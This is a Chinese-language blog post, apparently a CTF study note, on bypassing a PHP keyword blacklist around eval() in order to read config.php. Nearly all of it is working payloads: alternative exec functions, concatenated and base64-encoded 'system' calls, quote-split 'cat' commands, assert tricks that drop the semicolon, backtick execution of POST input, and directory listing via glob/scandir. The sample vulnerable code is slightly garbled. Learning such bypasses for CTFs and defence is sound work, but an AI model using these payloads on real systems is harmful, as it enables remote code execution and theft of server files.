命令执行绕过黑名单方法

最新推荐文章于 2023-12-14 10:28:47 发布
最新推荐文章于 2023-12-14 10:28:47 发布
阅读量1.4k 收藏 9
点赞数 3
分类专栏: 笔记 文章标签: php
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_53498616/article/details/114905990
版权 
# flag in config.php
if(!preg_match("/system|exec|highlight/i",preg_match($c)){
	eval($c);
}

根据黑名单的不同,获取config.php的内容有以下几种方法:
1.命令执行函数
system()、passthru()、exec()、shell_exec()、popen()、proc_open()、pcntl_exec()
?c=passthru('cat config.php');
2.构造
?c=$a='sys';$b='tem';$d=$a.$b;$d('cat config.php');
3.绕过cat命令
?c=highlight_file('config.php');
?c=system('ca""t config.php');
?c=system("ca''t config.php");
?c=system('ca\t config.php');
linux有很多类似于cat的方法:tac、more、less、head、tail、nl、sed、sort、uniq
4.base64绕过
?c=$a=base64_decode('c3lzdGVt');$b=base64_decode('Y2F0IGNvbmZpZy5waHA=');$a($b);
5.绕过分号;
?c=system('cat config.php')?>
?c=assert(base64_decode('c3lzdGVtKCdjYXQgY29uZmlnLnBocCcp'))?> //assert()会将字符串当做PHP代码来执行,并且字符串末尾可以没有分号
6.POST传值
?c=echo `$_POST[1]`; //然后再通过post传参1=cat config.php
其他函数:
//打印该目录下所有文件名
?c=var_dump(glob('*')); //信息更全面
?c=print_r(glob('*'));
?c=print_r(scandir('.'))
//下面两个同第二个,只是不带参数
?c=print_r(scandir(pos(localeconv())));
?c=print_r(scandir(current(localeconv())));
Ryuuz4k1
关注
  • 3
    点赞
  • 9
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
命令执行绕过笔记
weixin_30532987的博客
01-18 379
https://www.jianshu.com/p/5e505e3d8075 http://www.4hou.com/reverse/5643.html cmd1.php <?php $cmd=$_GET['cmd']; echo "执行的语句:"; echo $cmd; echo "<br>执行结果:"; system($cmd); ?> 首先随便试试?cmd=ls,...
命令执行绕过姿势
qq_45888826的博客
10-04 645
命令执行绕过姿势
关于命令执行/注入 以及常见的一些绕过过滤的方法
热门推荐
小白渣的博客
02-29 1万+
打开题目直接给了源码, <?php $str=""; if(!empty($_GET)){ $str=$_GET["calc"]; } ?> 以及<?php echo "result:".shell_exec("echo $str | bc"); ?> 可以看出其没有对用户输入的内容进行一定过滤直接传给shell_exec函数执行。所以存在命令行漏洞。 这...
RCE-命令执行总结
m0_62008601的博客
11-23 942
命令执行总结,更新ing~~
web安全-命令执行漏洞
weixin_61956136的博客
07-25 1913
web安全-命令执行漏洞
第三节 文件上传-绕过黑名单验证-01
09-15
通过这种方法,我们可以绕过黑名单验证,上传可执行的脚本文件。 三、Burpsuite 绕过黑名单验证 Burpsuite 是一个功能强大的 Web 应用安全测试工具。我们可以使用 Burpsuite 绕过黑名单验证,上传可执行的脚本文件...
第五节 文件上传-绕过黑名单验证(大小写绕过)-01
09-15
文件上传-绕过黑名单验证(大小写绕过) 文件上传是一种常见的 Web 应用程序漏洞,攻击者可以通过上传恶意文件来获取服务器的控制权。绕过黑名单验证是文件上传攻击的一种常见 technique,这种技术可以 bypass 黑...
深入了解SQL注入绕过waf和过滤机制
02-11
绕过 WAF 的方法可以分为九类,包括大小写混合、替换关键字、使用编码、使用注释、等价函数与命令、使用特殊符号、HTTP 参数控制、缓冲区溢出和整合绕过等。 大小写混合是一种最简单的绕过技术,用于针对小写或大写...
Cyrillic:用于用西里尔字母替换消息中的合适字符,以绕过列入黑名单的单词过滤器或规避关键字检测
05-08
BetterDiscord的插件,用于将消息中的合适字符替换为无法识别的西里尔字母,以绕过列入黑名单的单词过滤器或规避关键字检测 下载 如何使用 该插件会自动运行; 但是,如果您出于任何目的要发送无西里尔字母的消息,...
ctf.show web入门(命令执行)29~56
qq_61768489的博客
01-27 3008
web29 error_reporting(0); if(isset($_GET['c'])){ $c = $_GET['c']; if(!preg_match("/flag/i", $c)){ eval($c); } }else{ highlight_file(__FILE__); } preg_match()函数学习一下: preg_match函数是进行正则表达式的匹配,成功返回1,否则返回0 在这个正则里边有一个参数是i,这个在正则
远程命令/代码执行漏洞(RCE)总结
nigo134的博客
07-04 8388
PHP命令执行函数 1. system() : 原型:string system ( string $command [, int &$return_var ] ) 与passthru的基本相同,但是system返回结果并且输出。(查看system和pssthru的返回值可以看出) 2. shell_exec(): shell_exec — 通过 shell 环境执行命令 ( 这就意味着这个方法只能在 linux 或 mac os的shell环境中运行 ),并且将完整的输出以字符串的方式返
ctfshow 命令执行 刷题记录
qq_63548648的博客
12-16 865
1
[BJDCTF2020]EzPHP之preg_match绕过
weixin_42478365的博客
08-21 4183
打开链接之后发现页面为: 右击查看不了源码,按F12查看源码得到 GFXEIM3YFZYGQ4A= 使用base64,base32与base16一个一个试,得知是base32,解密之后为:1nD3x.php,之后在url上输入查看得到代码: <?php highlight_file(__FILE__); error_reporting(0); $file = "1nD3x.php"; $shana = $_GET['shana']; $passwd = $_GET['passwd']; $
ctfshow 命令执行 web29-web77 web118-122 web124 wp
mumuzi的博客
01-31 1646
芜湖
preg_match函数绕过
weixin_42346836的博客
10-16 4673
PHP preg_match():执行正则表达式匹配 函数语法格式如下: preg_match($pattern,$subject [, &$matches [, $flags = 0 [, $offset = 0 ]]]) ###参数说明如下: $pattern:要搜索的模式,也就是编辑好的正则表达式; $subject:要搜索的字符串; $matches:可选参数(数组类型),如果提供了 $matches,它将被填充为搜索结果。 $matches[0] 包含完整模式匹配到的文本, $mat
CTFSHOW WEB入门 命令执行 web29-48
sinat_41572027的博客
07-09 1809
CTFSHOW WEB入门 命令执行 web29-48
ctfshow 命令执行
m0_74097148的博客
05-21 3530
dev/null文件可以被看作是一个“黑洞”文件。它等价于一个只写的的文件。所有写入它的内容都会永远丢失(因为不可读)。这里说flag在36.php中,那么我们想办法构造处36即可.这里参考大佬的做法。/dev/null 2>&1主要意思是不进行回显,让命令回显,我们进行命令分隔。如下图第一个元素为点号。
ctfshow简单题web1-15
qq_62984336的博客
03-10 924
ctfshow萌新 ctfshow萌新web1web2-4web5-7web5web6web7web9web10web11web12web13web14、15 总结:这几题主要都是正则匹配字符过滤的绕过,基本步骤都是源码中查看过滤规则->找到注入点->传入payload。只在web1中写了比较完整的步骤,剩下的题目主要只说对于字符过滤的绕过方法。 web1 1.手动注入。需要绕过函数inval,要求id不能大于999且id=1000,所以用'1000'字符代替数字1000 .
escapeshellarg参数绕过和注入的问题
最新发布
m0_75178803的博客
12-14 1371
将给字符串增加一个单引号并且能引用或者转义任何已经存在的单引号,这样以确保能够直接将一个字符串传入 shell 函数,并且还是确保安全的。PHP 将尝试将反引号中的内容作为 shell 命令执行,并将其输出信息返回。用空格替换了百分号、感叹号(延迟变量替换)和双引号,并在字符串两边加上双引号。在windows系统中,system函数直接在控制台调用一个command命令。参数,命令执行后的返回状态会被写入到此变量。参数, 那么会用命令执行的输出填充此数组。)都会被一个额外的反斜线所转义。
python 绕过黑名单中函数 拼接法
05-28
绕过黑名单中函数的方法有很多种,其中之一就是使用拼接法。 拼接法的基本思路是将要绕过的函数名拆分成多个字符串,然后通过字符串的拼接来构造出完整的函数名。因为黑名单中的函数名是字符串形式,所以可以通过...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值